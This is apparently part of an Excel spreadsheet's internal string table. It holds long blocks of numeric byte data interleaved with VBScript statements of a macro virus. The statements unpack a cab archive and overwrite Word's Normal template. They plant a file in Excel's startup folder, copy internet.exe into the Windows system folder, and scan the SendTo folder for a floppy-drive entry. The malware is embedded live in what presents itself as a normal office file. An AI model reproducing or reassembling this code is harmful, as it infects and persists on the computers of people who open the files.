    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 150 74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 233 199 216 73 202 152 129 114 129 43 46 222 43 99 115 123 53 226 13 143 205 237 53 136 103 45 28 147 219 107 17 175 164 112 204 124 239 68 60 103 225 152 249 174 67 188 246 177 243 117 210 19 186 54 203 68 126 37 23 208 245 106 19 9 21 234 158 16 109 106 7 35 132 66 169 42 46 20 52 197 162 184 167 196 211 118 218 254 74 215 87 169 131 40 175 88 122 84 206 209 138 137 82 129 36 6 250 113 238 254 183 198 26 231 190 244 214 167 26 231 236 111 141 127 156 163 94 166 223 153 118 156 83 100 118 152 139 96 142 102 114 168 76 244 39 42 178 87 0 12 175 226 61 205 17 234 205 56 191 115 156 74 215 215 255 230 248 7 194 88 97 166 238 22 69 188 90 173 215 135 11 83 187 216 165 111 126 62 3 225 216 19 33 90 134 </t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">216 144 156 163 21 166 233 135 69 60 124 163 45 155 85 177 203 184 12 177 145 63 250 41 245 33 30 8 239 226 190 10 67 208 247 91 222 7 150 57 217 123 85 218 62 89 116 46 241 254 247 185 168 13 243 218 203 209 200 167 232 194 52 93 198 51 240 60 206 179 167 229 2 110 25 80 44 39 20 75 159 98 137 9 139 88 240 226 246 157 26 187 75 99 119 170 246 103 122 235 46 39 175 51 232 253 213 189 201 27 97 30 5 117 97 89 242 253 246 169 229 44 237 89 18 168 158 132 176 33 128 151 1 222 2 248 47 128 73 48 158 221 10 176 0 96 5 192 6 128 102 0 47 192 1 128 7 0 142 1 76 49 179 216 119 193 60 13 176 3 236 255 2 230 5 128 215 0 174 1 152 97 64 179 2 236 132 176 11 0 54 176 151 3 108 0 104 0 104 1 56 12 254 126 48 31 0 56 14 240 24 192 25 128 231 87 226 58 55 139 93 2 243 10 192 239 1 114 97 224 43 4 88 1 80 85 142 231 12 66 45 2 68 1 14 1 124 3 224 4 192 99 0 167 203 121 249 70 238 185 104 173 174 109 11 210 178 118 171 187 93 110 237 8 69 221 129 116 107 169 105 215 90 71 174 231 82 10 237 190 189 173 157 229 43 146 41 134 61 157 101 250 208 229 203 88 154 213 220 100 120 89 185 79 231 19 86 188 210 174 18 87 215 70 124 73 154 171 189 123 34 209 61 218 21 115 177 26 175 95 211 86 169 115 243 2 99 42 247 133 163 26 172 218 136 26 135 159 143 199 15 121 75 150 94 179 178 175 45 235 72 202 137 21 130 26 151 122 210 222 200 245 111 253 219 0 162 199 31 220 61 218 202 255 200 149 252 17 28 78 225 32 247 210 190 19 24 25 174 175 133 240 40 111 20 148 21 121 54 234 187 1 124 39 50 190 55 5 169 239 51 50 190 151 168 174 85 106 44 221 27 18 205 27 20 44 139 223 223 217 229 231 177 20 185 174 174 245 236 11 233 36 88 188 141 49 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 101 40 67 25 202 80 134 50 148 86 37 207 208 155 64 103 1 238 96 44 134 </t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">159 121 131 103 12 95 181 22 243 227 177 53 120 38 218 3 25 203 224 127 60 197 127 2 43 235 162 115 237 98 203 192 60 15 230 114 48 7 210 196 199 125 152 215 83 232 226 123 44 179 77 233 253 11 50 248 23 103 240 175 4 195 181 149 49 171 25 104 16 251 156 119 54 242 253 216 138 187 175 145 199 87 220 103 154 24 187 162 193 63 177 29 240 53 225 138 178 154 241 149 97 51 107 100 173 160 215 176 6 176 213 178 122 182 5 220 181 160 111 4 59 170 127 182 252 250 6 167 71 217 77 170 191 9 193 194 82 239 70 216 64 122 51 237 216 218 40 246 74 213 178 0 237 5 69 181 128 98 53 65 168 27 124 35 98 127 99 114 15 228 100 203 128 37 100 194 116 27 197 78 56 220 131 154 154 210 102 194 41 101 43 0 238 32 179 138 120 83 194 114 192 191 90 236 35 195 60 246 67 137 220 224 226 123 182 220 172 29 236 62 202 109 5 155 10 184 124 23 118 59 235 162 189 172 90 220 145 59 85 25 165 143 59 116 21 122 154 197 110 210 36 253 184 219 178 84 236 165 43 37 92 125 250 35 99 104 241 57 61 181 186 92 253 26 138 70 238 32 231 252 158 5 113 234 137 83 187 197 94 57 191 74 95 32 99 92 237 158 68 228 228 4 38 73 102 106 27 40 49 101 93 146 100 5 187 133 228 105 89 151 213 202 93 40 109 203 187 240 179 103 186 51 128 98 114 225 26 204 216 114 69 11 140 197 184 129 63 244 2 109 112 16 99 37 232 143 27 149 201 192 95 130 190 165 24 181 63 200 190 214 141 122 34 113 173 59 196 242 0 251 90 136 113 147 233 76 106 188 121 49 150 123 25 45 185 87 185 113 121 92 125 14 167 3 224 65 70 119 15 12 66 233 7 179 0 242 210 192 65 198 206 37 52 113 18 124 111 168 196 251 40 149 79 49 243 23 203 167 207 85 61 152 200 10 105 93 137 68 86 183 240 200 230 159 190 100 117 115 15 229 83 24 37 92 117 135 152 206 157 100 245 23 225 62 124 88 235 78 186 208 141 174 171 87 21 183 222 133 106 52 215 255 178 74 164 85 79 39 18 195 236 32 52 128 185 48 86 101 1 160 121 240 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">58 51 37 198 15 235 18 215 39 36 18 215 215 37 18 31 39 50 43 189 156 155 210 13 21 90 90 71 161 119 205 193 196 51 195 115 175 175 27 206 250 56 49 60 23 224 224 199 137 79 18 163 195 211 137 143 135 215 38 62 126 230 233 196 245 53 235 192 28 155 222 81 249 53 248 199 231 151 49 155 51 148 161 12 101 40 67 25 106 108 117 241 103 83 46 127 251 241 89 111 142 244 191 19 158 90 110 36 38 211 249 29 138 210 221 215 7 15 41 51 132 251 134 102 220 61 152 113 206 100 168 63 69 245 9 192 173 140 169 119 64 224 145 18 88 231 120 128 2 238 84 192 163 15 240 60 3 220 212 130 199 4 224 71 250 184 54 148 39 158 83 149 123 219 112 135 62 158 85 148 47 228 161 94 152 120 63 29 158 35 132 247 210 225 153 46 184 137 190 6 0 119 182 227 61 106 184 157 29 207 131 154 207 248 89 58 184 255 27 175 54 184 141 175 59 81 26 184 211 117 9 227 231 189 44 5 192 189 142 183 51 190 94 131 95 167 227 199 207 203 25 63 99 11 247 157 225 231 242 184 95 12 247 130 225 62 47 220 245 132 59 154 112 183 210 90 146 109 198 214 137 57 53 110 3 194 157 41 213 98 125 5 207 1 192 125 22 184 171 2 207 136 172 5 184 27 224 207 112 93 4 160 142 241 115 134 144 46 60 45 106 43 227 119 208 53 210 202 11 99 219 104 133 6 207 197 161 117 52 186 135 238 203 0 120 131 26 158 153 131 171 2 95 1 104 101 252 202 9 188 163 97 23 99 116 198 14 126 89 141 247 215 117 136 244 241 238 185 30 134 187 59 24 195 175 226 241 107 104 252 68 29 215 54 240 9 29 159 247 238 99 252 46 59 252 224 29 87 45 186 0 246 210 154 4 163 243 248 240 91 106 188 243 239 126 128 3 12 239 184 231 103 253 225 115 48 214 125 3 11 210 121 82 18 212 74 128 86 133 246 127 170 254 227 86 144 24 69 150 232 78 195 108 179 118 205 2 89 201 94 123 249 37 243 239 218 135 76 206 205 11 103 163 137 231 50 56 103 113 132 237 116 214 209 30 224 1 210 177 231 83 247 95 83 153 217 52 53 205 67 233 104 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">10 41 180 47 226 118 92 165 171 2 41 104 5 41 109 96 245 80 215 120 106 84 19 184 171 161 46 27 198 76 203 198 76 116 205 169 85 180 137 116 202 250 234 75 179 180 229 215 134 241 220 63 187 202 134 30 88 41 251 164 49 242 15 221 49 53 37 255 201 217 64 249 164 137 108 198 204 23 178 158 131 6 49 9 66 223 4 14 13 88 158 38 62 189 69 114 27 194 126 193 221 222 233 11 72 95 144 170 34 26 220 38 164 1 215 134 214 130 109 18 251 57 184 158 52 229 97 79 132 87 205 108 15 134 247 236 10 6 247 60 12 200 185 108 38 17 60 149 244 105 164 255 128 162 159 37 125 45 132 92 131 46 160 101 85 199 188 74 241 20 189 195 236 36 188 56 233 54 210 115 25 46 213 253 152 226 188 70 62 101 208 177 225 138 87 226 96 31 177 238 1 16 185 222 123 26 235 191 8 255 211 105 253 29 90 124 128 60 83 19 52 248 78 58 154 79 130 238 201 3 221 131 196 26 104 161 22 151 105 139 44 75 160 2 167 49 147 141 253 42 97 131 190 182 4 96 62 244 159 171 25 247 105 129 126 53 233 91 100 89 9 188 46 72 135 126 15 164 234 129 142 234 222 12 17 43 96 224 152 153 26 145 175 195 166 207 141 135 21 89 214 131 44 23 101 142 58 122 206 74 34 62 102 135 225 192 212 10 197 231 104 118 176 37 209 208 127 53 211 135 234 19 74 135 97 3 12 155 38 196 73 122 145 197 1 35 24 140 97 173 146 93 154 95 50 127 126 105 171 180 26 237 45 75 181 46 219 82 27 217 156 173 82 145 101 63 228 179 42 51 121 188 20 99 19 153 25 143 147 186 14 126 169 228 150 195 32 90 166 33 215 81 58 130 226 164 7 16 189 110 93 146 236 89 48 213 131 129 189 101 1 47 216 226 213 45 197 194 222 178 184 200 50 23 68 101 150 54 244 158 6 79 251 189 58 20 9 132 98 182 138 130 249 104 210 0 39 226 44 132 68 164 17 56 250 148 4 226 205 108 0 167 40 165 164 138 44 179 217 227 48 59 1 185 185 189 195 70 34 166 152 139 154 108 12 131 127 200 131 231 118 115 111 197 188 203 197 131 159 224 193 172 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">149 123 43 102 100 171 141 93 22 135 71 127 148 144 52 93 230 160 132 254 38 197 255 195 241 249 155 63 165 63 251 127 232 111 98 169 124 158 8 83 80 194 191 62 210 191 36 131 191 61 131 255 146 12 254 139 211 250 99 191 79 244 88 244 254 89 138 127 78 210 255 239 204 22 102 141 77 76 160 9 51 43 50 167 196 44 100 78 141 101 145 57 45 54 129 204 233 177 73 137 157 52 186 244 192 228 233 75 56 111 54 229 142 184 86 253 40 100 218 12 191 239 155 44 184 232 107 153 65 195 60 87 5 52 133 102 89 89 201 135 177 234 96 23 30 168 188 10 103 163 102 246 180 41 27 0 102 151 62 19 27 102 115 110 110 16 51 88 24 231 55 6 195 146 79 90 43 149 73 77 65 169 108 101 41 76 182 3 209 144 59 234 93 219 29 12 183 59 182 4 195 157 110 127 147 167 51 228 119 71 61 14 23 4 72 139 36 91 139 13 38 224 29 145 160 163 45 24 218 223 225 243 123 36 91 219 170 150 0 33 59 218 131 81 91 137 196 83 41 145 154 194 93 158 42 124 79 171 67 95 31 10 249 125 109 110 220 58 233 104 140 186 195 209 174 144 154 54 37 83 230 216 231 239 180 149 116 238 239 8 250 219 61 225 146 40 36 115 11 127 248 32 194 238 235 242 69 97 190 86 219 33 41 35 126 164 216 183 216 17 112 119 122 214 218 52 41 72 81 175 39 80 77 136 91 130 81 9 137 64 2 60 251 124 145 104 164 120 156 100 44 150 154 32 149 245 153 138 44 104 29 181 80 54 206 137 57 108 178 25 198 229 14 144 22 31 189 144 197 233 117 49 184 59 160 7 87 94 31 150 64 95 19 124 240 210 94 27 200 225 157 208 171 75 116 12 45 190 94 156 74 143 84 89 120 204 38 146 210 238 241 123 162 158 116 196 148 35 199 85 206 56 112 175 233 120 121 110 226 143 101 221 42 91 181 236 92 236 136 184 247 122 224 9 35 10 115 45 5 197 209 232 245 120 128 155 54 189 200 2 114 117 208 223 213 25 136 20 47 67 107 104 191 148 49 209 177 19 128 167 182 110 71 67 87 64 178 45 172 174 175 107 116 213 84 47 148 110 111 147 254 167 </t>
  </si>
  <si>
    <t>set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">189 171 15 106 226 136 226 151 128 18 5 197 239 47 164 46 17 36 145 24 9 248 173 1 52 160 162 129 162 1 17 77 165 71 114 33 167 201 5 239 14 2 78 109 11 182 106 71 180 142 86 90 63 58 173 245 3 191 58 214 106 171 237 212 58 109 167 173 51 118 172 99 59 163 78 213 58 106 71 170 50 142 86 59 227 119 223 238 94 2 145 20 253 195 191 58 13 147 187 219 183 187 183 111 223 123 191 183 111 247 194 30 43 203 34 95 134 82 36 148 226 70 32 3 137 147 93 30 182 220 200 85 115 32 242 84 42 245 1 138 157 155 77 72 246 181 24 140 145 160 4 166 185 172 105 92 251 182 228 105 177 37 24 221 161 13 220 19 167 217 33 114 128 10 95 25 222 222 89 167 37 118 201 182 8 89 171 127 1 107 193 35 44 48 22 178 98 57 39 99 105 155 181 132 73 193 41 251 8 143 145 244 97 14 46 148 235 240 9 86 31 173 107 214 130 72 60 158 244 52 163 211 227 49 140 210 194 156 217 5 61 224 88 135 27 185 92 248 205 137 24 23 196 148 165 246 37 51 76 66 195 254 93 50 241 161 81 115 64 147 208 251 108 98 91 137 180 93 69 114 33 74 167 58 3 56 128 12 77 45 102 237 33 187 182 202 96 212 216 104 249 224 222 181 45 243 185 192 110 210 116 7 107 29 148 209 135 24 127 58 164 205 0 129 132 249 197 197 238 229 218 86 230 175 35 179 254 40 188 131 177 15 91 180 131 45 35 198 143 89 44 227 5 86 172 65 172 195 193 73 18 242 139 188 204 33 86 66 131 77 26 152 73 227 127 25 135 203 190 112 233 54 91 38 213 200 156 206 203 59 117 238 42 131 96 240 14 19 244 250 206 48 117 174 148 161 136 193 224 112 247 104 141 174 64 35 241 97 33 199 85 59 56 143 81 174 150 181 110 172 5 145 43 167 45 107 167 78 207 41 41 181 20 205 156 153 147 95 88 90 100 203 153 105 183 249 92 178 159 21 57 123 30 239 16 125 18 164 236 197 188 224 244 249 37 187 165 82 20 57 65 158 197 137 18 232 222 14 186 180 231 42 27 227 83 117 105 249 214 201 57 74 83 10 131 207 169 45 150 222 124 204 </t>
  </si>
  <si>
    <t>for each ff in fold.files</t>
  </si>
  <si>
    <t xml:space="preserve">179 90 83 208 132 131 198 148 70 161 129 45 211 140 101 5 38 79 189 183 206 111 180 85 112 14 158 245 76 38 105 64 186 13 234 23 250 180 122 125 58 163 81 147 106 0 1 179 223 104 33 144 178 185 125 162 236 168 148 117 196 202 43 130 78 20 142 46 23 1 166 94 3 118 208 137 174 222 180 241 202 33 210 50 32 133 23 137 178 160 176 100 210 211 91 142 121 86 191 210 182 191 128 93 129 171 150 33 240 132 76 196 187 96 252 45 247 1 76 184 52 240 41 92 218 56 13 197 53 246 152 19 176 39 112 87 193 64 27 14 110 97 252 30 128 31 96 104 64 224 57 103 177 158 74 78 77 23 228 4 179 41 150 97 188 102 94 144 100 17 219 175 22 105 245 16 118 56 125 200 239 198 221 247 102 164 2 91 30 159 175 162 3 46 237 77 49 117 111 41 47 24 148 26 237 140 31 116 252 238 251 164 95 128 62 56 205 184 211 113 248 13 13 124 21 40 9 217 42 203 16 117 129 10 70 116 250 174 12 147 205 123 17 120 169 137 18 194 56 27 193 48 54 142 140 187 208 119 170 220 23 21 127 41 57 68 190 66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
        <charset val="0"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 